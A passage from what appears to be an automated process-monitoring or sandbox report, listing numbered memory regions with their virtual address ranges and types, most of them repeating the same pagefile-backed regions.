"pagefile_0x0000000000530000" filename = "" Region: id = 9518 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9519 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9520 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9521 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9522 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9523 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9524 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9525 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9526 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9527 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9528 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9529 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9530 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9531 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9532 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9533 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9534 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9535 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9536 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9537 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9538 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9539 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9540 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9541 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9542 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9543 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9544 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9545 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9546 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9547 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9548 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9549 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9550 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9551 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9552 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9553 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9554 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9555 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9556 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9557 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9558 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9559 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9560 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9561 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9562 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9563 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9564 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9565 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9566 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9567 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9568 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9569 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9570 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9571 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9572 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9573 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9574 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9575 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9576 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9577 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9578 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9579 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9580 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9581 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9582 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9583 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9584 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9585 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9586 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9587 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9588 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9589 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9590 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9591 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9592 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9593 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9594 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9595 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9596 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9597 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9598 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9599 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9600 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9601 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9602 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9603 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9604 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9605 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9606 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9607 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9608 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9609 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9610 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9611 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9612 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9613 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9614 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9615 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9616 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9617 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9618 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9619 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9620 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9621 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9622 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9623 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9624 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9625 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9626 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9627 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9628 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9629 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9630 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9631 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9632 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9633 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9634 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9635 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9636 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9637 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9638 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9639 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9640 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9641 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9642 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9643 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9644 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9645 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9646 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9647 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9648 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9649 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9650 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9651 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9652 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9653 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9654 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9655 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9656 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9657 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9658 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9659 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9660 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9661 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9662 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9663 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9664 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9665 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9666 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9667 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9668 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9669 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9670 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9671 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9672 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9673 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9674 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9675 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9676 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9677 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9678 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9679 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9680 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9681 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9682 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9683 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9684 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9685 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9686 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9687 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9688 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9689 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9690 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9691 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9692 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9693 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9694 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9695 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9696 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9697 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9698 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9699 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9700 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9701 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9702 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9703 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9704 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9705 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9706 